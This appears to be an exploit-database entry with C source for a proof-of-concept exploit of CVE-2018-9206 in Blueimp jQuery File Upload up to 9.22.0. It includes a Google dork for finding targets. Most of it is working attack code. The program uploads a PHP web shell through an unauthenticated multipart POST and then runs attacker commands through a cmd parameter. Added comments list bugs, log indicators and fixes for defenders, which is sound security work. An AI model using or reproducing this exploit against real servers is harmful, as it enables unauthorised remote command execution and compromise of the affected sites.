9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206
# Google Dork: inurl: /jquery-file-upload/server/php
# Date: 1/15/2019
# Exploit Author: Larry W. Cashdollar
# Vendor Homepage: http://www.vapidlabs.com
# Software Link: [download link if available]
# Version: <= 9.22.0
# Tested on: Linux
# CVE : CVE-2018-9206
/*Exploits CVE-2018-9206 to install a webshell.*/
/*http://www.vapidlabs.com/advisory.php?v=204 */
/*$ gcc main.c -o blue_exploit */
/*Larry W. Cashdollar @_larry0*/
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
/* Size in bytes of both the request buffer (payload) and the response read buffer in main(). */
#define BSIZE 1024
/* When nonzero, main() echoes the generated HTTP request to stdout. */
#define DEBUG 1
/* When nonzero, main() skips the connect/send and recv/close sections and only builds the request. */
#define TESTONLY 0
/* Formats one HTTP request into p; func selects the GET (nonzero) or the multipart POST (zero) form. */
void build_string (char *p, char *path, char *arg, char *ar1, int func);
/*
 * Command-line driver for the CVE-2018-9206 proof of concept (unauthenticated
 * arbitrary file upload in jQuery File Upload <= 9.22.0, per the header above).
 *
 * Arguments, as the usage string gives them: hostname port path [command].
 *   - With four arguments (argc == 5) `function` is set and build_string()
 *     produces a GET for <path>/files/shell.php?cmd=<command>.
 *   - Otherwise build_string() produces the multipart POST to
 *     <path>/index.php that uploads shell.php.
 *
 * Returns 0 after printing usage or finishing the exchange, and -1 when the
 * socket cannot be created, the address does not parse, or connect() fails.
 *
 * For defenders: as published, this traffic is recognisable in web-server
 * logs as a POST to the upload handler followed by GET requests for a .php
 * file under files/ carrying a cmd query parameter, both with the fixed
 * User-Agent set in build_string(). Those literals are trivially changed, so
 * the durable controls are upgrading past 9.22.0, enforcing a server-side
 * allowlist of uploadable file types, and configuring the web server so that
 * nothing in the upload directory is ever executed as a script.
 */
int
main (int argc, char *argv[])
{
Ā int sock = 0, bytes_read = 0, total = 0, function = 0;
Ā struct sockaddr_in serv_addr;
Ā char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
  /* Only the no-argument case is rejected here. NOTE(review): argv[2],
     argv[3] and argv[4] are read below without any further argc check, so an
     invocation with one or two arguments reads a NULL or out-of-range
     argv entry. */
Ā if (argc <= 1)
Ā Ā {
Ā Ā Ā printf
("CVE-2018-9206 Exploit\n@_larry0\nUsage: %s hostname port path command\n",
argv[0]);
Ā Ā Ā return (0);
Ā Ā }
  /* A fourth argument switches from the upload request to the GET request. */
Ā if (argc == 5)
Ā Ā function = 1;
  /* IPv4 TCP socket; it is created even when TESTONLY is set. */
Ā if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
Ā Ā {
Ā Ā Ā printf ("\nSocket creation error\n");
Ā Ā Ā return (-1);
Ā Ā }
  /* argv[3] is the path, argv[1] becomes the Host header value, argv[4] the
     cmd value (argv[4] is the NULL terminator when argc == 4, and is not
     formatted in that mode). */
Ā build_string (payload,argv[3] ,argv[1], argv[4], function);
if (!TESTONLY){
Ā memset (&serv_addr, 0, sizeof (serv_addr));
Ā serv_addr.sin_family = AF_INET;
  /* atoi() gives no error indication, so the port is used unvalidated. */
Ā serv_addr.sin_port = htons (atoi (argv[2]));
  /* inet_pton(AF_INET, ...) accepts only a dotted-quad IPv4 literal, so the
     "hostname" argument is not resolved through DNS. */
Ā if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
Ā Ā {
      /* NOTE(review): this and the next error return leave sock open. */
Ā Ā Ā printf ("\nInvalid address.\n");
Ā Ā Ā return (-1);
Ā Ā }
Ā if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
Ā Ā {
Ā Ā Ā printf ("\nConnection Failed.\n");
Ā Ā Ā return (-1);
Ā Ā }
  /* Single send() of the whole request; its return value is not checked. */
Ā send (sock, payload, strlen (payload), 0);
}
Ā if (DEBUG)
Ā Ā printf ("\nSending Payload:\n%s", payload);
if (!TESTONLY) {
  /* Read and print the response until recv() reports end of stream or an
     error. */
Ā while (1)
Ā Ā {
Ā Ā Ā bytes_read = recv (sock, buffer, BSIZE, 0);
      /* total is updated before the <= 0 test, so a -1 error return is
         added to the count as well. */
Ā Ā Ā total += bytes_read;
Ā Ā Ā if (bytes_read <= 0)
break;
      /* NOTE(review): recv() may fill all BSIZE bytes, leaving no NUL
         terminator for the %s below; the server controls this data, so the
         print can read past the end of buffer. */
Ā Ā Ā printf ("%s", buffer);
      /* Clear the buffer so a shorter next read is NUL-terminated. */
Ā Ā Ā bzero (buffer, BSIZE);
Ā Ā }
Ā printf ("\n[+] Total bytes read: %d\n", total);
Ā close (sock);
}
Ā return (0);
}
/*
 * Formats one HTTP/1.1 request into p, writing at most BSIZE bytes.
 *
 *   p    - output buffer; the caller passes an array of BSIZE bytes.
 *   path - inserted after the leading '/' of the request target.
 *   arg  - used as the Host header value.
 *   ar1  - used as the cmd query value; only formatted when func is nonzero.
 *   func - nonzero: GET for <path>/files/shell.php; zero: multipart POST to
 *          <path>/index.php.
 *
 * All three strings are inserted verbatim with %s (no URL or header
 * encoding), and the snprintf() return value is not checked, so a request
 * longer than BSIZE - 1 bytes is silently truncated.
 *
 * Log indicators for this tool as published: the User-Agent
 * "blueimp jquery exploit/9.22.0", the multipart boundary ending in
 * c8e05c8871143853, the literal Content-Length of 244, an uploaded file named
 * shell.php, and follow-up requests for files/shell.php with a cmd parameter.
 * All of these are constants in the format strings below and can differ in
 * other tooling, so detection is better keyed on an upload to the handler
 * followed by a request for a script file in the upload directory.
 */
void
build_string (char *p, char *path,char *arg, char *ar1, int func)
{
Ā if (func)
  /* Request for the previously uploaded file, with ar1 as the cmd value. */
Ā Ā Ā snprintf (p, BSIZE,
"GET /%s/files/shell.php?cmd=%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\n\r\n", path,ar1, arg);
Ā else
  /* Multipart upload of a one-line PHP file named shell.php in the form
     field "files"; the Content-Length is a fixed literal, not computed. */
Ā Ā snprintf (p, BSIZE,
Ā Ā Ā "POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
}